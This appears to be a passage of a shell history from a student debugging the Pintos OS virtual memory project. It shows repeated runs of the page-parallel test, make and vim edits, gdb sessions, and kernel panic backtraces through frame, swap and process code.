0xc002241d 0xc002455d 0xc0024207 0xc00322ef 0xc002f299 0xc00221c5 0xc002241d 0x8048b7e +pintos -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 20 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace 0xc002ab92 0xc0023437 0xc002f257 0xc00221c5 0xc002241d 0xc002b2e1 0xc003238a 0xc002d625 0xc002d715 0xc00211c4 0xc002f034 0xc002f28d 0xc00221c5 0xc002241d 0x80490de +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace 0xc002ab92 0xc0023437 0xc002f257 0xc00221c5 0xc002241d 0xc002b2e1 0xc003238a 0xc002d625 0xc002d715 0xc00211c4 0xc002f034 0xc002f28d 0xc00 +backtrace 0xc002ab92 0xc0023437 0xc002f257 0xc00221c5 0xc002241d 0xc002b2e1 0xc003238a 0xc002d625 0xc002d715 0xc00211c4 0xc002f034 0xc002f28d 0xc00221c5 0xc002241d 0x80490de +clear +backtrace 0xc002ab92 0xc0023437 0xc002f257 0xc00221c5 0xc002241d 0xc002b2e1 0xc003238a 0xc002d625 0xc002d715 0xc00211c4 0xc002f034 0xc002f28d 0xc00221c5 0xc002241d 0x80490de +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos-gdb kernel.o +clear +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0023437 0xc002f257 0xc00221c5 0xc002241d 0xc002b2e1 0xc00323e3 0xc002d625 0xc002d715 0xc00211c4 0xc002f034 0xc002f1b7 0xc00221c5 0xc002241d. +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 6 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 7 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +clear +Call stack: 0xc002ab92 0xc0031896 0xc0030aad 0xc00308fa 0xc002d726 0xc00211c4 0xc002f02c 0xc002f2c0 0xc00221c5 0xc002241d 0xc002b2e1 0xc003236d 0xc002d621 0xc002d73d 0xc00211c4 0xc002f670 0xc002fc96 0xc00221c5 0xc002241d 0x804abb8 0x8bfc458b 0xfffe3fe8 +pintos -j 7 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0031897 0xc0030a72 0xc00308bf 0xc002d726 0xc00211c4 0xc002f02c 0xc002f285 0xc00221c5 0xc002241d 0xc002b2e1 0xc0032332 0xc002d621 0xc002d73d 0xc00211c4 0xc002f635 0xc002fc5b 0xc00221c5 0xc002241d 0x804abb8 0x8bfc458b 0xfffe3fe8 +clear +make +pintos-gdb kernel.o +clear +make +ls +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=9 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=9 run page-parallel +make +make +c;ear +clear +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=9 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=9 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0031897 0xc0030a72 0xc00308bf 0xc002d726 0xc00211c4 0xc002f02c 0xc002f285 0xc00221c5 0xc002241d 0xc002b2d3 0xc0032332 0xc002d621 0xc002d73d 0xc00211c4 0xc002f02c 0xc002f1af 0xc00221c5 0xc002241d 0x8048283 0x80482fa 0xcccccccc +make +backtrace Call stack: 0xc002ab92 0xc0031897 0xc0030a72 0xc00308bf 0xc002d726 0xc00211c4 0xc002f02c 0xc002f285 0xc00221c5 0xc002241d 0xc002b2d3 0xc0032332 0xc002d621 0xc002d73d 0xc00211c4 0xc002f02c 0xc002f1af 0xc00221c5 0xc002241d 0x8048283 0x80482fa 0xcccccccc +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +make +clear +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=14 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0031897 0xc0030a72 0xc00308bf 0xc002d726 0xc00211c4 0xc002f02c 0xc002f285 0xc00221c5 0xc002241d 0xc002b2d3 0xc0032332 0xc002d621 0xc002d73d 0xc00211c4 0xc002f02c 0xc002f1af 0xc00221c5 0xc002241d 0xcccccccc +make +backtrace Call stack: 0xc002ab92 0xc0031897 0xc0030a72 0xc00308bf 0xc002d726 0xc00211c4 0xc002f02c 0xc002f285 0xc00221c5 0xc002241d 0xc002b2d3 0xc0032332 0xc002d621 0xc002d73d 0xc00211c4 0xc002f02c 0xc002f1af 0xc00221c5 0xc002241d 0xcccccccc +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=8 run page-parallel +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=8 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=9 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +clear +pintos-gdb kernel.o +clear +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +pintos-gdb kernel.o +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=10 run page-parallel +clear +make +pintos-gdb kernel.o +make +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +pintos-gdb kernel.o +clear +vim frame.c +vim swap.c +ls +vim frame.c +vim exception.c +cscope +vim exception.c +vim exception.c +make +vim exception.c +make +vim exception.c +vim process.c +vim exception.c +vim process.c +vim exception.c +rm .exception.c.swp +vim process.c +vim exception.c +vim thread.c +c d.. +vim process.c +clear +vim process.c +make +vim process.c +vim exception.c +pintos --gdb -j 10 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +cledar +clear +make +pintos --gdb -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +clear +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0021162 0xc002373e 0xc00235d7 0xc0024227 0xc0032307 0xc002f2b1 0xc00221c5 0xc002241d 0x8048b7e +clear +ls +clear +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos --gdb -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +clear +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +clear +make +pintos --gdb -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +clear +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0023437 0xc0032340 0xc002dffe 0xc002dc76 0xc002d40f 0xc002149a. +make +clear +0xc002ab92: debug_panic (.../../lib/kernel/debug.c:38) +0xc0023437: lock_acquire (...../../threads/synch.c:231) +0xc0032340: frame_alloc (...uild/../../vm/frame.c:116) +0xc002dffe: setup_stack (...../userprog/process.c:649) +0xc002dc76: load (...../userprog/process.c:508) +0xc002d40f: start_process (.../../userprog/process.c:95) +0xc002149a: kernel_thread (..../../threads/thread.c:475) +clear +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 7 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +backtrace Call stack: 0xc002ab92 0xc0031896 0xc0030aad 0xc00308fa 0xc002d726 0xc00211c4 0xc002f02c 0xc002f2c0 0xc00221c5 0xc002241d 0xc002b2e1 0xc003236d 0xc002d621 0xc002d73d 0xc00211c4 0xc002f670 0xc002fc96 0xc00221c5 0xc002241d 0x804abb8 0x8bfc458b 0xfffe3fe8 +make +0xc002ab92: debug_panic (.../../lib/kernel/debug.c:38) +0xc0031897: inode_allow_write (...../../filesys/inode.c:337) +0xc0030a72: file_allow_write (.../../../filesys/file.c:141) +0xc00308bf: file_close (...d/../../filesys/file.c:51) +0xc002d726: process_exit (...../userprog/process.c:253) +0xc00211c4: thread_exit (..../../threads/thread.c:307) +0xc002f02c: stack_growth (.../userprog/exception.c:125) +0xc002f285: page_fault (.../userprog/exception.c:243) +0xc00221c5: intr_handler (..../threads/interrupt.c:367) +0xc002241d: intr_entry (threads/intr-stubs.S:38) +0xc002b2e1: list_remove (.../../lib/kernel/list.c:253) +0xc0032332: frame_free (...uild/../../vm/frame.c:125) +0xc002d621: free_resource (...../userprog/process.c:200) +0xc002d73d: process_exit (...../userprog/process.c:259) +0xc00211c4: thread_exit (..../../threads/thread.c:307) +0xc002f635: sys_exec (.../../userprog/syscall.c:95) +0xc002fc5b: syscall_handler (...../userprog/syscall.c:336) +0xc00221c5: intr_handler (..../threads/interrupt.c:367) +0xc002241d: intr_entry (threads/intr-stubs.S:38) +0x0804abb8: (unknown) +0x8bfc458b: (unknown) +0xfffe3fe8: (unknown) +clear +pintos --gdb -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +quit +clear +pintos --gdb -j 5 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -v -k -T 60 --qemu --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 4 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +make +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +make +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 8 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=14 run page-parallel +pintos -j 2 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=14 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=14 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 3 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=11 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=13 run page-parallel +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +make +clear +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear --swap-size=4 -- -q -f -ul=12 run page-parallel +make +pintos -j 1 -v -k --bochs --filesys-size=2 -p tests/vm/page-parallel -a page-parallel -p tests/vm/child-linear -a child-linear 